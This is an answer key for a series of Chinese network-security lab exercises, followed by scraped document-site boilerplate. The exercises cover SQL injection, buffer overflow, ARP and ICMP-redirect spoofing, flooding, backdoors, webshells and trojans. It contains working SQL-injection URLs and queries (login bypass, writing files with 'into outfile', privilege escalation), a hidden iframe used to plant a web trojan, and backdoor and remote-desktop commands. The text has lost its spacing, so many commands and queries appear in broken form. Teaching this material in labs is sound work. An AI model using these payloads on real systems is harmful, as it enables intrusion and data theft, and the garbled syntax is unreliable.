在服務器上刪除已獲取的.操作成功后接收方使用命令QUIT退出與服務器的連接..實驗15數(shù)據(jù)庫安全練習一SQL注入一.PHP訪問MySQL簡單實例2.編寫PHP腳本查詢user數(shù)據(jù)庫表寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMuserWHEREusername='angel'ANDpassword='mypass'.3.實施SQL注入〔1〕注入是否成功?不成功.寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMuserWHEREusername='angel'or1=1'ANDpassword=''.〔2〕注入是否成功?成功.寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMuserWHEREusername='angel'or'1=1'ANDpassword=''.通過分析SQL查詢語句解釋實驗現(xiàn)象:SQL查詢時邏輯AND優(yōu)先邏輯OR.〔3〕注入是否成功?成功.寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMuserWHEREusername='angel'#'ANDpassword=''.〔4〕利用"/*〞實現(xiàn)注入的URL語句:://本機IP/access.php?username=angel'%2F%2A.SQL查詢語句:SELECT*FROMuserWHEREusername='angel'/*'ANDpassword=''.〔5〕SQL查詢語句:SELECT*FROMuserWHEREusername=''ANDpassword=''or1=1andusername='angel'.URL:://本機IP/access.php?username=&password='or1=1andusername='angel.〔6〕SQL查詢語句:SELECT*FROMuserWHEREusername=''ANDpassword=''or1=1anduserid='1'.URL:://本機IP/access.php?username=&password='or1=1anduserid='1.二.搜索引擎注入3.編寫PHP腳本查詢file數(shù)據(jù)庫表輸入關鍵字"snort〞,進行搜索,搜索結果中含有多少條記錄?3條.記錄中是否包含與snort關鍵字無關的項不包含.寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMfileWHERETITLELIKE'%snort%'.4.SQL注入〔1〕輸入關鍵字"%〞,進行搜索,搜索結果中含有多少條記錄?4.記錄中是否包含與snort關鍵字無關的項包含honeypotpaper.寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMfileWHERETITLELIKE'%%%'.解釋SQL查詢語句含義:索引TITLE列,模糊查詢?nèi)坑涗?〔2〕寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMfileWHERETITLELIKE'%_'ORDERBYfileid#%'.解釋SQL查詢語句含義:按fileid順序〔由小到大〕,模糊查詢?nèi)坑涗?三.注入實現(xiàn)導出文件基于步驟一,寫出能夠?qū)崿F(xiàn)〔SQL注入〕上述功能的URL:://本機IP/access.php?username='or1=1intooutfile'/etc/temp.txt'%23寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMuserWHEREusername=''or1=1intooutfile'/etc/temp.txt'#'ANDpassword=''.四.通過注入提升用戶權限〔1〕寫出數(shù)據(jù)表包含的字段名稱:通過輸入describeregister命令,得到數(shù)據(jù)表包含字段名稱為Field、Type、Null、Key、Default、Extra.〔2〕注冊用戶級別〔userlevel〕3.〔3〕單擊"注冊〞按鈕,用戶注冊級別1.寫出此時PHP腳本中具體的SQL查詢語句:INSERTINTOregisterVALUES<0,’jlcss’,’1234’,’’,’1’>#’,3>.實驗16軟件安全練習一軟件漏洞利用一.Outlook通訊簿中的安全隱患2.驗證通訊薄備份的自動恢復功能〔1〕主機A運行"host1A.WAB〞,打開Outlook通訊薄,可以在"主標識的聯(lián)系人〞中查看聯(lián)系人信息:##host1A,電子地址host1ACServer.NetLab.關閉Outlook通訊薄,可以發(fā)現(xiàn)在桌面生成"host1A.WAB~〞,此文件即為"host1A.WAB〞的備份文件.〔3〕主機A再次運行"host1A.WAB〞文件,提示如下信息:查看通訊薄中聯(lián)系人信息:##host1A,電子地址host1ACServer.NetLab.3.通訊薄備份的自動恢復功能漏洞利用〔3〕主機A再次將文件"host1A.WAB〞中數(shù)據(jù)破壞,恢復后查看通訊薄,可以觀察到通訊薄"host1A.WAB〞中聯(lián)系人信息已經(jīng)被篡改,其中聯(lián)系人信息為:##jlcss,電子地址jlcssCServer.NetLab.二.利用迅雷漏洞植入木馬1.生成網(wǎng)頁木馬〔4〕訪問網(wǎng)頁木馬主機A查看"灰鴿子遠程控制〞程序主界面的"文件管理器〞屬性頁中"文件目錄瀏覽〞樹,是否出現(xiàn)上線主機否?2.木馬的植入〔3〕主機A查看"灰鴿子遠程控制〞程序主界面的"文件管理器〞屬性頁中"文件目錄瀏覽〞樹,此時是否出現(xiàn)上線主機是?3.迅雷網(wǎng)頁木馬的防御方法〔3〕主機A查看"灰鴿子遠程控制〞程序主界面的"文件管理器〞屬性頁中"文件目錄瀏覽〞樹,此時是否出現(xiàn)上線主機否?實驗17協(xié)議脆弱性分析練習一SNMP協(xié)議脆弱性分析一.SNMP協(xié)議脆弱性分析2.主機B進行SNMP掃描與網(wǎng)絡嗅探〔1〕查看默認共同體類型為public〔2〕名稱返回結果sysDescrLinuxExpNIS.Netlab2.6.15-1.2054_FC5#1TueMar1415:48:33EST2006i686sysNameExpNIS.NetlabipDefaultTTL643.主機C使用SNMP工具修改主機A節(jié)點值〔2〕雙擊獲得該值信息ExpNIS.Netlab4.主機B分析捕獲數(shù)據(jù)包〔1〕記錄SNMP共同體為:jlcss〔2〕截獲內(nèi)容為:changedbymanager二.SNMP協(xié)議脆弱性利用2.根據(jù)DATA區(qū)的數(shù)據(jù)內(nèi)容恢復文件〔1〕獲得主機名ExpNIS.Netlab〔2〕是否被更新是.〔3〕 通知主機C查看sysName節(jié)點值是否被更新是..實驗18安全協(xié)議練習一IPSec-IP安全協(xié)議二.IPsec虛擬專用網(wǎng)絡的檢測〔1〕填寫ping操作反饋信息:正常.〔2〕填寫ping操作反饋信息:NegotiatingIPSecurity.〔3〕填寫ping操作反饋信息:Requesttimedout.〔4〕填寫ping操作反饋信息:正常.三.協(xié)議分析ESP〔4〕ESP協(xié)議類型值50.安全參數(shù)索引<SPI>值是421F0A9〔隨機值〕序列號是4.ICMP負載是否被加密封裝是.四.協(xié)議分析AH〔8〕AH協(xié)議類型值〔十進制〕51.下一個報頭所標識的協(xié)議類型是ICMP.載荷長度值是4.由該值計算出AH報頭總長度是:24,具體計算方法:載荷長度值加2后乘以4.安全參數(shù)索引值是8B280016〔隨機值〕.ICMP負載是否被加密封裝沒有.練習二SSL-安全套接層協(xié)議一.使用Apache+OpenSSL組合實現(xiàn)安全通信1.CA簽發(fā)客戶端證書〔1〕OpenSSL命令:req-newkeyrsa:1024-keyoutclient.key-outclient.pem-days365-passoutpass:jlcsspkicli-configopensslf〔2〕OpenSSL命令:ca-inclient.pem-passinpass:jlcsspkica-batch-outclient.crt-keyfileca.key-certca.crt-configopensslf〔3〕OpenSSL命令:pkcs12-export-inclient.crt-inkeyclient.key-passinpass:jlcsspkicli-passoutpass:clientpkcs12-outcli_pkcs12.pfx.實驗19信息搜集練習一信息搜集一.信息搜集1.ping探測主機A回復數(shù)據(jù)包的TTL值:128;操作系統(tǒng)可能為:WindowsNT/2K/XP/2003.主機B回復數(shù)據(jù)包的TTL值:64;操作系統(tǒng)可能為:Linux.2.Nmap掃描〔1〕Nmap命令〔TCP端口掃描〕:nmap-sS-T5目標IP;探測到主機A開放的TCP端口有:2180135139;主機B開放的TCP端口:212380.Nmap命令〔UDP端口掃描〕:nmap-sU目標IP;探測到主機A開放的UDP端口:123137138;主機B開放的UDP端口:111.〔2〕Nmap命令:nmap-T5-O目標IP.查看掃描結果:主機A為Running<JUSTGUESSING>:MicrosoftWindowsXP|2000|2003<95%>;主機B為:Running:Linux〔3〕主機A、B提供Web服務使用的軟件類型分別為:Microsoft-IIS/6.0和Apache/<Fedora>.主機A、B提供FTP服務使用的軟件類型分別為:MicrosoftFTPservice和VSFTPd.〔4〕Nmap命令:nmap-T5-sO目標IP--dns_server.練習二主機發(fā)現(xiàn)任務一ARP主機發(fā)現(xiàn)二.主機發(fā)現(xiàn)程序開發(fā)源碼答案:參見應用服務器中源碼答案19-2-1.練習三端口掃描任務一TCP端口掃描源碼答案:參見應用服務器中源碼答案19-3-1任務二UDP端口掃描〔9〕詳細說明UDP端口掃描原理:掃描主機向目標端口發(fā)送數(shù)據(jù)包,如果目標主機返回ICMP端口不可達數(shù)據(jù)包,則表明該端口是關閉的,否則就是開啟的.源碼答案:參見應用服務器中源碼答案19-3-2..實驗20漏洞掃描練習二模擬攻擊方法一.初步掃描〔2〕主機A分析掃描結果,從掃描結果中可以了解到主機B開放了21、23、80、135、139、445、1025、1027端口,使用的是Windows2003操作系統(tǒng),確定具有攻擊價值.二.進一步掃描〔2〕賬戶類型為管理員〔Administrator〕密碼為1234.三.開啟遠程桌面服務3.通過修改注冊表開啟主機B遠程桌面:主機A登錄成功后在命令提示符下執(zhí)行"regquery"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer"〞查看執(zhí)行結果,fDenyTSConnections的值為0x1.主機A確定修改是否成功,在命令提示符下再次執(zhí)行regquery"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer命令,查看"fDenyTSConnections〞的值,"fDenyTSConnections〞的值為0x0.主機A再次使用遠程桌面連接主機B,連接是否成功是〔是/否〕.練習三Web漏洞掃描器源碼答案:參見應用服務器中源碼答案20-3..實驗21網(wǎng)絡嗅探練習二原始套接字嗅探器源碼答案:參見應用服務器中源碼答案21-2.練習三Winpcap嗅探器源碼答案:參見應用服務器中源碼答案21-3..實驗22緩沖區(qū)溢出練習一緩沖區(qū)溢出攻擊二.利用ms08025漏洞進行攻擊2.使用系統(tǒng)命令添加用戶請解釋出現(xiàn)上述現(xiàn)象的原因:當前用戶為普通用戶,普通用戶沒有添加用戶的權限.練習二本地緩沖區(qū)溢出任務一利用跳轉指令實現(xiàn)緩沖區(qū)溢出二.溢出實現(xiàn)3.生成實現(xiàn)彈出對話框的指令碼〔3〕所以我們需要在匯編代碼中正確設置堆棧并調(diào)用MessageBoxA函數(shù)的絕對內(nèi)存地址,該地址為0x77E4D8DE.函數(shù)ExitProcess的絕對內(nèi)存地址0x7C813039.源碼答案:參見應用服務器中源碼答案22-2-1.任務二定位參數(shù)地址實現(xiàn)緩沖區(qū)溢出二.溢出實現(xiàn)6.回答問題〔1〕OverFlowServer.exe程序中,shellcode函數(shù)入口偏移地址0x1020與函數(shù)體大小0x197<字節(jié)>.〔2〕OverFlowServer.exe程序中,在OverFlow調(diào)用前ebp基地址0x0012FF80和調(diào)用返回時的指令地址0x0040110A.〔3〕OverFlowServer.exe程序中,TempBuffer緩沖區(qū)內(nèi)存地址0x0012F968與其大小432<字節(jié)>.源碼答案:參見應用服務器中源碼答案22-2-2.任務三緩沖區(qū)溢出實現(xiàn)用戶權限提升3.提升權限〔1〕輸入命令:whoami,當前登錄的用戶是guest.〔2〕輸入命令:cat/etc/shadow,嘗試查看陰影文件,此時系統(tǒng)提示cat:/etc/shadow權限不夠.上述情況證實root用戶有對陰影文件的訪問權,其它任何用戶均無此權限.〔3〕輸入命令:passwdroot,嘗試修改root用戶登錄口令,此時系統(tǒng)提示passwd:Onlyrootcanspecifyausername.練習三遠程溢出與后門植入二.遠程溢出實現(xiàn)〔可選〕源碼答案:參見應用服務器中源碼答案22-3..實驗23拒絕服務攻擊練習一洪泛攻擊一.SYN洪水攻擊3.洪水攻擊〔5〕靶機為什么會消耗大量的系統(tǒng)資源:問題就出在TCP連接的三次握手中,假設一個用戶向服務器發(fā)送了SYN報文后突然死機或掉線,那么服務器在發(fā)出SYN+ACK應答報文后是無法收到客戶端的ACK報文的〔第三次握手無法完成〕,這種情況下服務器端一般會重試〔再次發(fā)送SYN+ACK給客戶端〕并等待一段時間后丟棄這個未完成的連接,這段時間的長度我們稱為SYNTimeout,一般來說這個時間是分鐘的數(shù)量級〔大約為30秒-2分鐘〕;一個用戶出現(xiàn)異常導致服務器的一個線程等待1分鐘并不是什么很大的問題,但如果有一個惡意的攻擊者大量模擬這種情況,服務器端將為了維護一個非常大的半連接列表而消耗非常多的資源.實際上如果服務器的TCP/IP棧不夠強大,最后的結果往往是堆棧溢出崩潰——即使服務器端的系統(tǒng)足夠強大,服務器端也將忙于處理攻擊者偽造的TCP連接請求而無暇理睬客戶的正常請求〔畢竟客戶端的正常請求比率非常之小〕,此時從正??蛻舻慕嵌瓤磥?服務器失去響應,這種情況我們稱作:服務器端受到了SYNFlood攻擊〔SYN洪水攻擊〕.練習三Smurf攻擊二.Smurf攻擊1.攻擊實現(xiàn)〔3〕主機A是否與主機B進行過ICMP通信:否.表23-3-1源IP源MACIP/MAC地址對是否匹配主機CIP主機CMAC匹配主機DIP主機DMAC匹配主機EIP主機EMAC匹配主機FIP主機FMAC匹配〔4〕表23-3-2實驗主機源IP源MACIP/MAC地址對是否匹配主機C主機BIP主機AMAC不匹配主機D主機BIP主機AMAC不匹配主機E主機BIP主機AMAC不匹配主機F主機BIP主機AMAC不匹配2.構造數(shù)據(jù)〔1〕表23-3-3目的MAC源MAC源IP目的IP協(xié)議類型類型/代碼KmacHmacTipKipICMP8/0〔2〕表23-3-4目的MAC源MAC源IP目的IP協(xié)議類型類型/代碼TmacKmacKipTipICMP0/0.實驗24欺騙攻擊練習一ARP欺騙一.ARP欺騙攻擊1.正常通信〔4〕是否監(jiān)聽到目標主機間的通信數(shù)據(jù):不能.目標主機不在同一個共享設備上,正常狀態(tài)下目標主機一和二間的通信,黑客主機監(jiān)聽不到它們之間的信息.2.ARP攻擊〔3〕目標主機二是否接收到數(shù)據(jù):否目標主機間的通信是否正常:不正常是否監(jiān)聽到目標主機間的通信數(shù)據(jù):是目標主機一發(fā)送給目標主機二的數(shù)據(jù)包,其目的MAC是黑客主機的MAC地址.〔4〕是否正常:不正常目標主機一的ARP緩存表中與目標主機二IP相映射的MAC地址已更新為黑客主機的MAC地址.3.單向欺騙〔4〕目標主機二是否接收到數(shù)據(jù):收到黑客主機將接收到的源IP為目標主機一、目的IP為目標主機二的數(shù)據(jù)包重新轉發(fā)給目標主機二.〔9〕是否能夠ping通:能數(shù)據(jù)包在網(wǎng)絡中的傳輸路徑:目標主機一→黑客主機→目標主機二.〔10〕是否監(jiān)聽到主機一給主機二發(fā)出的ICMP回顯請求數(shù)據(jù)包:是是否監(jiān)聽到主機二給主機一發(fā)出的ICMP回顯應答數(shù)據(jù)包:否目標主機二的ARP緩沖表中與目標主機一IP相映射的MAC地址仍然是目標主機一的MAC地址.所以目標主機二會將ICMP回顯應答數(shù)據(jù)包直接發(fā)送給目標主機一.二.防XARP欺騙1.清空ARP緩存表清空ARP緩存表命令:arp-d.2.IP/MAC地址綁定<2>腳本文件:echooffarp-darp-s5200-0c-29-95-b5-e9exit練習二ICMP重定向二.ICMP重定向攻擊〔2〕主機A使用ping命令測試和主機F之間網(wǎng)絡的連接情況.主機A、F對所捕獲的數(shù)據(jù)包進行分析,完成下表.實驗主機ICMP報文類型源IP目的IP源MAC目的MAC主機A請求主機A主機F主機A主機Eeth0回顯主機F主機A主機Eeth0主機A主機F請求主機A主機F主機A主機Eeth0請求主機A主機F主機Eeth1主機F回顯主機F主機A主機F主機Eeth1回顯主機F主機A主機Eeth0主機A仔細觀察主機F捕獲到的數(shù)據(jù)包,這些ICMP數(shù)據(jù)包是否成對出現(xiàn)?是,若是,那么每對中的數(shù)據(jù)包都是相同的嗎?不是,如果不同,它們有什么區(qū)別?MAC地址是不同的,為什么會出現(xiàn)這樣的結果:因為主機E、F在同一共享模塊下,主機F可以捕獲到主機E與主機A通信的數(shù)據(jù)包.〔3〕確認連通后,主機A、F分別使用路由跟蹤查看通信時所經(jīng)過的網(wǎng)關,命令:tracert主機FIP,tracert主機AIP,網(wǎng)關IP:主機EIP.〔4〕主機A、F分別使用ping命令探測各自網(wǎng)關,然后查看ARP緩存表,使用命令:arp-a,可以得出各自網(wǎng)關MAC地址:主機EMAC.〔6〕主機A刷新協(xié)議分析器,查看主機B發(fā)給主機A的ICMP重定向數(shù)據(jù)包,類型:5,代碼:1,網(wǎng)關地址:虛假IP,有效載荷數(shù)據(jù)的長度:28.〔7〕主機A再次清空協(xié)議分析器,使用ping命令向主機F發(fā)出ICMP回顯請求,此時能否得到回復?否.為什么?因為主機A與主機F之間的路由被串改成了虛假IP,主機A與主機F通信時,數(shù)據(jù)包發(fā)給了虛假IP地址,此時主機F沒有收到ICMP請求數(shù)據(jù)包.〔8〕主機A使用路由跟蹤命令探測與主機F之間的路由.結果:超時.〔9〕主機A查看本機路由表,命令:routeprint,可以發(fā)現(xiàn)多了一條路由表項:主機A到主機F的路由信息.三.ICMP重定向欺騙攻擊〔5〕主機A使用ping命令向主機F發(fā)出ICMP回顯請求,對所捕獲的數(shù)據(jù)包再次分析,根據(jù)主機A、F,主機B、F間通信的數(shù)據(jù)包完成下表:實驗主機ICMP報文類型源IP目的IP源MAC目的MAC主機A請求主機A主機F主機A主機Beth0回顯主機F主機A主機Beth0主機A請求主機Beth1主機F主機Beth1主機F回顯主機F主機Beth1主機F主機Beth1主機F請求主機Beth1主機F主機Beth1主機F回顯主機F主機Beth1主機F主機Beth1〔6〕主機A、F分別使用路由跟蹤命令探測其間的路由.結果:主機A經(jīng)過網(wǎng)關主機B,主機F經(jīng)過網(wǎng)關主機E.為什么會出現(xiàn)這樣的結果,寫出原因:主機B對主機A進行了ICMP重定向欺騙攻擊,但并沒有對主機F進行攻擊.〔7〕主機A查看本機路由表,可以發(fā)現(xiàn)到主機F的路由表項:網(wǎng)關是主機B.四.ICMP重定向欺騙攻擊的防X〔3〕主機A查看本機路由表,是否發(fā)現(xiàn)新的路由表項沒有,協(xié)議分析器是否捕獲到ICMP重定向數(shù)據(jù)包是..實驗25網(wǎng)絡后門練習一shell后門二.遠程控制工具JlcssShell<1>端口21581是否開啟:開啟.練習二無端口后門二.ICMP后門實現(xiàn)4.后門通信分析<1>協(xié)議類型是:ARP通過該協(xié)議可以達到什么目標:獲取目標主機MAC地址<2>IP上層協(xié)議類型是:ICMP上層協(xié)議負載長度:10IP上層協(xié)議負載的最后6個字節(jié):search<3>響應數(shù)據(jù)內(nèi)容:TheBackDoorOK!IP上層協(xié)議類型是:ICMP<4>后門客戶程序發(fā)出枚舉受害主機運行進程的命令是:pslist<5>運行貪吃蛇程序后系統(tǒng)監(jiān)聽端口無變化.三.ICMP后門原理2.后門客戶程序〔1〕WSAStartup...MAKEWORD<2,1>調(diào)用WSAStartup函數(shù)加載Winsock庫,版本2.1.〔2〕WSASocket...IPPROTO_ICMP調(diào)用WSASocket函數(shù)創(chuàng)建原始套接字,應用協(xié)議為ICMP〔3〕setsockopt...SO_SNDTIMEO調(diào)用setsockopt設置套接字發(fā)送超時.〔4〕setsockopt...SO_RCVTIMEO調(diào)用setsockopt設置套接字接收超時.〔5〕constructdata通過pslist、pskillID來構造數(shù)據(jù)..實驗26特洛伊木馬練習一網(wǎng)頁木馬一.木馬的生成與植入3.木馬的植入Hacker.ini文件是由哪個進程創(chuàng)建的:winlogoin.exe;WindowsXPvista服務的執(zhí)行體文件是:Hacker.ini;8000服務遠程地址〔控制端〕地址:主機A的IP地址;在"進程監(jiān)控〞中出現(xiàn)的winlogoin.exe進程〔若存在〕在整個的木馬植入過程中起到的作用是:木馬服務器端安裝程序;練習二Webshell一.Webshell木馬2.
使用現(xiàn)有木馬控制web服務器〔3〕一開始程序先用CreateObject方法建立了一個wscript.shell控件的對象ws,然后用cmdStr存儲想要執(zhí)行的命令字符串,利用創(chuàng)建的對象調(diào)用exec函數(shù)執(zhí)行cmdStr中的命令.二.通過權限控制防X該類木馬〔5〕主機B在瀏覽器中輸入://主機A的IP:9090/shell.asp地址,查看修改后的訪問效果,效果為:無權限訪問shell.asp.〔6〕主機B再次訪問主機A"木馬2〞下的木馬文件asptroy.asp,進入"Wscript.shell〞頁面的效果為:拒絕訪問asptroy.asp.練習三ARP木馬與ARP防火墻三.驗證實現(xiàn)現(xiàn)象1.主機A開始"掛馬〞〔4〕查看灰鴿子序主界面"文件管理器〞|"文件目錄瀏覽〞|"自動上線主機〞是否出現(xiàn)上線主機是.2.主機B分析木馬被植入過程〔1〕打開IE瀏覽器,在任務欄上單擊鼠標右鍵,選擇"任務管理器〞,找到名為"IEXPLORE.EXE〞的進程,其用戶名為Administrator.〔2〕在IE瀏覽器地址欄中輸入"://主機F的IP地址〞,訪問主機F的WEB服務,訪問能否成功能?在打開的網(wǎng)頁中點擊右鍵,選擇"查看源文件〔V〕〞查看源文件內(nèi)容,發(fā)現(xiàn)源文件頭部有一條iframe語句:其內(nèi)容為<iframesrc='網(wǎng)馬地址'width=0height=0></iframe>.〔3〕查看"任務管理器〞,是否又出現(xiàn)一個名為"IEXPLORE.EXE〞的進程,其用戶名為SYSTEM.〔4〕在命令行下輸入命令"netstat-an〞,查看主機端口連接,連接8000端口的遠程地址是:主機A的IP.〔6〕表26-3-1主機B的會話過程表會話源MAC地址目的MAC地址源IP目的IP第一個GET主機B的MAC地址主機A的MAC地址主機B的IP外網(wǎng)IP第二個GET主機A的MAC地址主機E的內(nèi)網(wǎng)接口主機B的IP外網(wǎng)IP第一個/1.1主機E的內(nèi)網(wǎng)接口主機A的MAC地址外網(wǎng)IP主機B的IP第二個/1.1主機A的MAC地址主機B的MAC地址外網(wǎng)IP主機B的IP查看第二個/1.1的"首部字段〞中是否存在框架代碼,若存在,其內(nèi)容為<iframesrc='網(wǎng)馬地址'width=0height=0></iframe>.根據(jù)上表結果,描述主機B訪問網(wǎng)頁時被掛馬的過程黑客主機對內(nèi)網(wǎng)主機和網(wǎng)關同時發(fā)起ARP欺騙,當內(nèi)網(wǎng)主機B訪問外網(wǎng)網(wǎng)頁時,會將黑客主機當成網(wǎng)關,并將請求發(fā)送給黑客主機,黑客主機再將請求轉發(fā)給網(wǎng)關.由于網(wǎng)關也受到了欺騙,所以會將信息返回給黑客主機,黑客主機將返回信息插入了惡意代碼之后,再轉發(fā)給主機B,而惡意代碼的內(nèi)容就是一個網(wǎng)頁木馬.3.主機C抓包嗅探〔1〕主機C訪問"://主機F的IP地址〞,是否中馬是.〔3〕表26-3-2主機C的會話過程表會話源MAC地址目的MAC地址源IP目的IP第一個GET主機C的MAC地址主機E的內(nèi)網(wǎng)接口主機C的IP外網(wǎng)IP第一個/1.1主機A的MAC地址主機C的
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 工業(yè)廢水處理與環(huán)保技術創(chuàng)新
- 工業(yè)旅游的興起與發(fā)展機遇
- 工業(yè)安全管理與職業(yè)病防治
- 工業(yè)建筑改造與再生策略
- 工業(yè)自動化中實時機器視覺系統(tǒng)的研究
- 工業(yè)設備中的熱傳導與熱設計
- 工業(yè)生產(chǎn)中的火災風險評估
- 工業(yè)自動化與智能制造的結合點
- 工業(yè)設計中的材料與工藝選擇研究
- 工業(yè)自動化與生產(chǎn)監(jiān)控系統(tǒng)
- 區(qū)域國別研究的跨學科性
- 園藝論文開題報告范文
- 兒科學知到智慧樹章節(jié)測試課后答案2024年秋山東第一醫(yī)科大學
- 林業(yè)工程開工申請
- 寵物醫(yī)院服務行業(yè)可行性分析報告
- 2025年甘肅省中考語文作文預測題及范文
- 高等教育信息化建設方案
- GB/T 44757-2024鈦及鈦合金陽極氧化膜
- 《BOM培訓資料》課件
- 2024年廣東省公務員錄用考試《行測》真題及答案解析
- 生態(tài)養(yǎng)殖羊圈施工合同
評論
0/150
提交評論